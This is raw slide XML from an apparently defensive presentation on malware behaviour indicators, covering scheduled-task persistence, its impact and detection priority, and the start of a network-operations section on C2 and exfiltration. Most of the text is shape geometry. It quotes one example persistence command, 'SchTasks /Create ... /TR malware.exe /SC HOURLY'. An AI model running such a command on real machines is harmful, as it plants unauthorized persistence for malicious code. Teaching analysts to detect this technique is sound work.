                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32729" y="392762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14653" y="392762"/>
                  <a:pt x="0" y="378109"/>
                  <a:pt x="0" y="360034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32729"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14653"/>
                  <a:pt x="14653" y="0"/>
                  <a:pt x="32729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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197075" y="1636510"/>
            <a:ext cx="196381" cy="196381"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="196381" h="196381">
                <a:moveTo>
                  <a:pt x="98191" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="152383" y="0"/>
                  <a:pt x="196381" y="43998"/>
                  <a:pt x="196381" y="98191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196381" y="152383"/>
                  <a:pt x="152383" y="196381"/>
                  <a:pt x="98191" y="196381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43998" y="196381"/>
                  <a:pt x="0" y="152383"/>
                  <a:pt x="0" y="98191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="43998"/>
                  <a:pt x="43998" y="0"/>
                  <a:pt x="98191" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="88985" y="46027"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="88985" y="98191"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88985" y="101259"/>
                  <a:pt x="90519" y="104136"/>
                  <a:pt x="93089" y="105862"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="129911" y="130409"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="134130" y="133248"/>
                  <a:pt x="139845" y="132097"/>
                  <a:pt x="142683" y="127840"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145522" y="123582"/>
                  <a:pt x="144371" y="117905"/>
                  <a:pt x="140113" y="115067"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="107396" y="93281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107396" y="46027"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107396" y="40926"/>
                  <a:pt x="103292" y="36821"/>
                  <a:pt x="98191" y="36821"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93089" y="36821"/>
                  <a:pt x="88985" y="40926"/>
                  <a:pt x="88985" y="46027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Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8622567" y="1538319"/>
            <a:ext cx="3191195" cy="229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9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Scheduled Tasks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622567" y="1832891"/>
            <a:ext cx="3109369" cy="720064"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3109369" h="720064">
                <a:moveTo>
                  <a:pt x="32727" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3076642" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3094717" y="0"/>
                  <a:pt x="3109369" y="14652"/>
                  <a:pt x="3109369" y="32727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3109369" y="687338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3109369" y="705412"/>
                  <a:pt x="3094717" y="720064"/>
                  <a:pt x="3076642" y="720064"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32727" y="720064"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14652" y="720064"/>
                  <a:pt x="0" y="705412"/>
                  <a:pt x="0" y="687338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14664"/>
                  <a:pt x="14664" y="0"/>
                  <a:pt x="32727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5" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8720758" y="1931082"/>
            <a:ext cx="2970266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Task Scheduler Persistence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720758" y="2127463"/>
            <a:ext cx="2970266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SchTasks /Create /TN "Updater"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720758" y="2291114"/>
            <a:ext cx="2970266" cy="163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02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/TR "malware.exe" /SC HOURLY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622567" y="2651146"/>
            <a:ext cx="3174830" cy="58914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SchTaskCreate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1031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creates scheduled tasks for periodic malware execution, maintaining access even after system cleanup attempts.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7938506" y="3505405"/>
            <a:ext cx="3917805" cy="3165010"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3917805" h="3165010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3917805" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3917805" y="3165010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3165010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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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40" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8093156" y="3672329"/>
            <a:ext cx="163651" cy="163651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="163651" h="163651">
                <a:moveTo>
                  <a:pt x="10228" y="10228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15886" y="10228"/>
                  <a:pt x="20456" y="14799"/>
                  <a:pt x="20456" y="20456"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20456" y="127852"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20456" y="130665"/>
                  <a:pt x="22758" y="132966"/>
                  <a:pt x="25570" y="132966"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="153423" y="132966"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="159080" y="132966"/>
                  <a:pt x="163651" y="137537"/>
                  <a:pt x="163651" y="143195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163651" y="148852"/>
                  <a:pt x="159080" y="153423"/>
                  <a:pt x="153423" y="153423"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25570" y="153423"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11443" y="153423"/>
                  <a:pt x="0" y="141980"/>
                  <a:pt x="0" y="127852"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20456"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14799"/>
                  <a:pt x="4571" y="10228"/>
                  <a:pt x="10228" y="10228"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="40913" y="30685"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40913" y="25027"/>
                  <a:pt x="45483" y="20456"/>
                  <a:pt x="51141" y="20456"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112510" y="20456"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="118168" y="20456"/>
                  <a:pt x="122738" y="25027"/>
                  <a:pt x="122738" y="30685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122738" y="36342"/>
                  <a:pt x="118168" y="40913"/>
                  <a:pt x="112510" y="40913"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51141" y="40913"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45483" y="40913"/>
                  <a:pt x="40913" y="36342"/>
                  <a:pt x="40913" y="30685"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51141" y="56255"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="92054" y="56255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="97711" y="56255"/>
                  <a:pt x="102282" y="60826"/>
                  <a:pt x="102282" y="66483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102282" y="72141"/>
                  <a:pt x="97711" y="76711"/>
                  <a:pt x="92054" y="76711"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51141" y="76711"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45483" y="76711"/>
                  <a:pt x="40913" y="72141"/>
                  <a:pt x="40913" y="66483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40913" y="60826"/>
                  <a:pt x="45483" y="56255"/>
                  <a:pt x="51141" y="56255"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51141" y="92054"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132966" y="92054"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138624" y="92054"/>
                  <a:pt x="143195" y="96624"/>
                  <a:pt x="143195" y="102282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143195" y="107939"/>
                  <a:pt x="138624" y="112510"/>
                  <a:pt x="132966" y="112510"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51141" y="112510"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45483" y="112510"/>
                  <a:pt x="40913" y="107939"/>
                  <a:pt x="40913" y="102282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40913" y="96624"/>
                  <a:pt x="45483" y="92054"/>
                  <a:pt x="51141" y="92054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1" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8277263" y="3639599"/>
            <a:ext cx="3526679" cy="229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89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Persistence Impact Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Image 0" descr="https://kimi-img.moonshot.cn/pub/slides/26-01-16-22:31:17-d5l4ndeg0jb0seogcr3g.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="45" b="45"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8072700" y="3966901"/>
            <a:ext cx="3649417" cy="1800161"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343667" y="6770243"/>
            <a:ext cx="3763973" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3763973" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3763973" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3763973" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604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4" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343667" y="6770243"/>
            <a:ext cx="32730" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FB2C36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5" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478679" y="6907709"/>
            <a:ext cx="147286" cy="147286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="147286" h="147286">
                <a:moveTo>
                  <a:pt x="73643" y="147286"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="114288" y="147286"/>
                  <a:pt x="147286" y="114288"/>
                  <a:pt x="147286" y="73643"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147286" y="32998"/>
                  <a:pt x="114288" y="0"/>
                  <a:pt x="73643" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32998" y="0"/>
                  <a:pt x="0" y="32998"/>
                  <a:pt x="0" y="73643"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="114288"/>
                  <a:pt x="32998" y="147286"/>
                  <a:pt x="73643" y="147286"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73643" y="39123"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="77469" y="39123"/>
                  <a:pt x="80547" y="42201"/>
                  <a:pt x="80547" y="46027"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80547" y="78246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80547" y="82072"/>
                  <a:pt x="77469" y="85150"/>
                  <a:pt x="73643" y="85150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69817" y="85150"/>
                  <a:pt x="66739" y="82072"/>
                  <a:pt x="66739" y="78246"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66739" y="46027"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="66739" y="42201"/>
                  <a:pt x="69817" y="39123"/>
                  <a:pt x="73643" y="39123"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="65962" y="101259"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65787" y="98408"/>
                  <a:pt x="67209" y="95696"/>
                  <a:pt x="69653" y="94217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72097" y="92739"/>
                  <a:pt x="75160" y="92739"/>
                  <a:pt x="77604" y="94217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80048" y="95696"/>
                  <a:pt x="81470" y="98408"/>
                  <a:pt x="81295" y="101259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81470" y="104110"/>
                  <a:pt x="80048" y="106823"/>
                  <a:pt x="77604" y="108301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="75160" y="109779"/>
                  <a:pt x="72097" y="109779"/>
                  <a:pt x="69653" y="108301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67209" y="106823"/>
                  <a:pt x="65787" y="104110"/>
                  <a:pt x="65962" y="101259"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6467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6" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688597" y="6868434"/>
            <a:ext cx="3394495" cy="229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FF6467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 Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458223" y="7130276"/>
            <a:ext cx="3616687" cy="196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Enables long-term threat exposure and reinfection cycles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221582" y="6770243"/>
            <a:ext cx="3763973" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3763973" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3763973" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3763973" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604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9" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221582" y="6770243"/>
            <a:ext cx="32730" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF690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0" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356594" y="6907709"/>
            <a:ext cx="147286" cy="147286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="147286" h="147286">
                <a:moveTo>
                  <a:pt x="73643" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="74966" y="0"/>
                  <a:pt x="76289" y="288"/>
                  <a:pt x="77498" y="834"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131694" y="23819"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138023" y="26494"/>
                  <a:pt x="142741" y="32737"/>
                  <a:pt x="142712" y="40273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142568" y="68810"/>
                  <a:pt x="130831" y="121022"/>
                  <a:pt x="81266" y="144754"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76462" y="147056"/>
                  <a:pt x="70881" y="147056"/>
                  <a:pt x="66077" y="144754"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16483" y="121022"/>
                  <a:pt x="4775" y="68810"/>
                  <a:pt x="4631" y="40273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4603" y="32737"/>
                  <a:pt x="9320" y="26494"/>
                  <a:pt x="15649" y="23819"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="69817" y="834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71025" y="288"/>
                  <a:pt x="72320" y="0"/>
                  <a:pt x="73643" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="73643" y="19216"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="73643" y="127983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113341" y="108767"/>
                  <a:pt x="124014" y="66192"/>
                  <a:pt x="124272" y="40705"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="73643" y="19245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73643" y="19245"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF890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1" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566512" y="6868434"/>
            <a:ext cx="3394495" cy="229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FF8904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Detection Rate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336138" y="7130276"/>
            <a:ext cx="3616687" cy="196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85% of APTs use multiple persistence mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099498" y="6770243"/>
            <a:ext cx="3763973" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3763973" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3763973" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3763973" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604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4" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099498" y="6770243"/>
            <a:ext cx="32730" cy="654604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="654604">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654604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5" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8234510" y="6907709"/>
            <a:ext cx="147286" cy="147286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="147286" h="147286">
                <a:moveTo>
                  <a:pt x="119670" y="59835"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119670" y="73039"/>
                  <a:pt x="115384" y="85236"/>
                  <a:pt x="108163" y="95132"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="144582" y="131579"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148178" y="135175"/>
                  <a:pt x="148178" y="141015"/>
                  <a:pt x="144582" y="144611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="140986" y="148206"/>
                  <a:pt x="135146" y="148206"/>
                  <a:pt x="131550" y="144611"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="95132" y="108163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="85236" y="115384"/>
                  <a:pt x="73039" y="119670"/>
                  <a:pt x="59835" y="119670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26782" y="119670"/>
                  <a:pt x="0" y="92888"/>
                  <a:pt x="0" y="59835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="26782"/>
                  <a:pt x="26782" y="0"/>
                  <a:pt x="59835" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92888" y="0"/>
                  <a:pt x="119670" y="26782"/>
                  <a:pt x="119670" y="59835"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59835" y="101259"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="82698" y="101259"/>
                  <a:pt x="101259" y="82698"/>
                  <a:pt x="101259" y="59835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101259" y="36972"/>
                  <a:pt x="82698" y="18411"/>
                  <a:pt x="59835" y="18411"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36972" y="18411"/>
                  <a:pt x="18411" y="36972"/>
                  <a:pt x="18411" y="59835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18411" y="82698"/>
                  <a:pt x="36972" y="101259"/>
                  <a:pt x="59835" y="101259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6" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8444428" y="6868434"/>
            <a:ext cx="3394495" cy="229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6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Analysis Priority</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214053" y="7130276"/>
            <a:ext cx="3616687" cy="19638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31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High-confidence threat indicator with low false positives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39138" y="373051"/>
            <a:ext cx="67828" cy="542620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="67828" h="542620">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="67828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67828" y="542620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54262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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542620" y="339138"/>
            <a:ext cx="2763972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b="1" kern="0" spc="107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Category 03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42620" y="610448"/>
            <a:ext cx="2848757" cy="339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03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Network Operations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42620" y="1085241"/>
            <a:ext cx="11386548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2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API calls indicating command-and-control communications and data exfiltration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56095" y="1458292"/>
            <a:ext cx="3730515" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3730515" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3730515" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3730515" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="299289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356095" y="1458292"/>
            <a:ext cx="33914" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33914" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33914" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="299289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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508707" y="1593947"/>
            <a:ext cx="339138" cy="339138"/>
